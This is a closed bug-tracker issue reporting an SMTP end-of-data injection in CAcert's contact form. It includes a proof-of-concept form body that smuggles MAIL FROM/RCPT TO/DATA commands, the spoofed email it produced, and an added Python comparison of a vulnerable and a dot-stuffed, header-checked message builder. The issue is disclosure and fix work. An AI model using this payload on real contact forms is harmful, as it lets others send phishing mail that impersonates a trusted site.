View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0000145 | Main CAcert Website | logged out | public | 2006-03-04 10:13 | 2013-11-20 22:23 |
Reporter | Assigned To | ||||
Priority | urgent | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Fixed in Version | 2006 | ||||
Summary | 0000145: Beware of the Evil ... | ||||
Description |

It is possible to send SPAM and Phishing-E-Mails using the CAcert mailserver. These emails look exactly as if sent by CAcert or CAcert-Support.

Description
===========

The cacert sendmail() function doesn't check the variables for control commands. The SMTP protocol defines a single "." as the end of a message. If you insert a "." in your message you can start a new message afterwards.

Proof of Concept
================

Use the contact form on www.cacert.org and send the following message:

------------------8<-------------------------
test
.
MAIL FROM: XXXXX
RCPT TO: XXXXX
DATA
Subject: Owned!

Sorry ...
.
------------------8<-------------------------

And you will have the following email sent to whoever you like ...

------------------------8<---------------------------
Return-Path: <XXXXX>
Delivered-To: XXXXXXXX
Received: (qmail 16437 invoked from network); 3 Mar 2006 23:53:18 +0100
Received: from hlin.cacert.org (202.87.16.201)
  by setoy.chost.de with (DHE-RSA-AES256-SHA encrypted) SMTP; 3 Mar 2006 23:53:18 +0100
Received: from hlin.cacert.org (localhost [127.0.0.1])
  by hlin.cacert.org (Postfix) with SMTP id 07B33EA76B
  for <XXXXXXXX>; Sat, 4 Mar 2006 09:53:14 +1100 (EST)
Subject: Owned!
Message-Id: <20060303225314.07B33EA76B@hlin.cacert.org>
Date: Sat, 4 Mar 2006 09:53:14 +1100 (EST)
From: XXXXXXX
To: undisclosed-recipients:;
X-Length: 668
X-UID: 12259

Sorry ...
------------------------8<---------------------------

Solution
========

All fields written to the mailserver must be free of control commands such as "." and newlines in From: (to create other "RCPT TO:") ...

Chris
Tags | No tags attached. | ||||
Reviewed by | |||||
Test Instructions | |||||
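The two defects the report names, a body handed to the SMTP DATA phase without dot-stuffing and header fields that may carry newlines, shown side by side with the fix. This is an added example written for this page in Python; it is not CAcert's sendmail() and not the code of any mail server. The server side is a small model of the DATA-phase rule in RFC 5321 section 4.5.2 (a line consisting of a single "." ends the message; a leading "." in message text is sent doubled and stripped on receipt), written only to make visible how many messages a server would queue. All addresses and the attacker body are constructed placeholders.

```python
# Added example: SMTP end-of-data injection and the dot-stuffing / header fix.
# Not CAcert's code; the server below is a model of RFC 5321 4.5.2, not Postfix.

# Constructed sample input, shaped like the report's PoC (placeholder addresses):
# what an attacker types into a contact form's free-text field.
ATTACKER_BODY = (
    "test\r\n"
    ".\r\n"                                   # ends the legitimate message
    "MAIL FROM: attacker@example.invalid\r\n"  # ... and starts a new envelope
    "RCPT TO: victim@example.invalid\r\n"
    "DATA\r\n"
    "Subject: Owned!\r\n"
    "\r\n"
    "Sorry ...\r\n"
    ".\r\n"
)


def build_data_vulnerable(sender, subject, body):
    """Naive builder: concatenates form fields and appends the end-of-data
    marker with no dot-stuffing and no check of header values."""
    return f"From: {sender}\r\nSubject: {subject}\r\n\r\n{body}\r\n.\r\n"


def is_header_safe(value):
    """A header field value must not contain CR, LF or NUL; a newline in
    From: would let the sender inject further header lines."""
    return not any(c in value for c in ("\r", "\n", "\0"))


def sanitize_header(value):
    """Reject rather than strip: a value with control characters is an attack."""
    if not is_header_safe(value):
        raise ValueError("control characters in header field")
    return value


def dot_stuff(body):
    """Normalise line endings to CRLF and prefix every line that starts with
    '.' with another '.', so no line of user text can be the terminator."""
    text = body.replace("\r\n", "\n").replace("\r", "\n")
    lines = text.split("\n")
    return "\r\n".join(("." + ln) if ln.startswith(".") else ln for ln in lines)


def build_data_hardened(sender, subject, body):
    """Same layout as the vulnerable builder, with both checks applied."""
    hdr = f"From: {sanitize_header(sender)}\r\nSubject: {sanitize_header(subject)}\r\n\r\n"
    return hdr + dot_stuff(body).rstrip("\r\n") + "\r\n.\r\n"


def smtp_server_data_phase(stream, mail_from, rcpt_to):
    """Model of the receiving server once it has accepted DATA for the
    envelope (mail_from, rcpt_to).  Returns the messages it would queue:
    a lone '.' line ends a message; afterwards lines are read as commands
    (MAIL FROM / RCPT TO / DATA); a leading '.' inside message text is
    removed (undoing dot-stuffing).  Written for this example only."""
    messages = []
    envelope = {"mail_from": mail_from, "rcpt_to": rcpt_to}
    current = []
    in_data = True
    for line in stream.split("\r\n"):
        if in_data:
            if line == ".":
                messages.append({"envelope": dict(envelope), "text": "\r\n".join(current)})
                current = []
                in_data = False
            elif line.startswith("."):
                current.append(line[1:])
            else:
                current.append(line)
        else:
            upper = line.upper()
            if upper.startswith("MAIL FROM:"):
                envelope["mail_from"] = line[len("MAIL FROM:"):].strip()
            elif upper.startswith("RCPT TO:"):
                envelope["rcpt_to"] = line[len("RCPT TO:"):].strip()
            elif upper == "DATA":
                in_data = True
    return messages


if __name__ == "__main__":
    form, support = "form@example.invalid", "support@example.invalid"
    for name, builder in (("vulnerable", build_data_vulnerable),
                          ("hardened", build_data_hardened)):
        queued = smtp_server_data_phase(
            builder(form, "Contact form", ATTACKER_BODY), form, support)
        print(name, "->", len(queued), "message(s) queued; recipients:",
              [m["envelope"]["rcpt_to"] for m in queued])
```

With the vulnerable builder the model server queues two messages, the second addressed to the attacker's chosen recipient with the attacker's Subject; with the hardened builder it queues exactly one, whose body contains the literal ".", "MAIL FROM:" and "RCPT TO:" lines as harmless text. The header check rejects instead of stripping, since a CR or LF in a From: or Subject: field has no legitimate origin in a web form.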
Date Modified | Username | Field | Change |
---|---|---|---|
2006-03-04 10:13 | | New Issue | |
2006-03-04 10:38 | duane | Status | new => closed |
2006-03-04 10:38 | duane | Note Added: 0000091 | |
2006-03-04 10:38 | duane | Resolution | open => fixed |
2013-01-13 16:59 | Werner Dworak | Fixed in Version | => 2006 |
2013-11-20 22:23 | NEOatNHNG | View Status | private => public |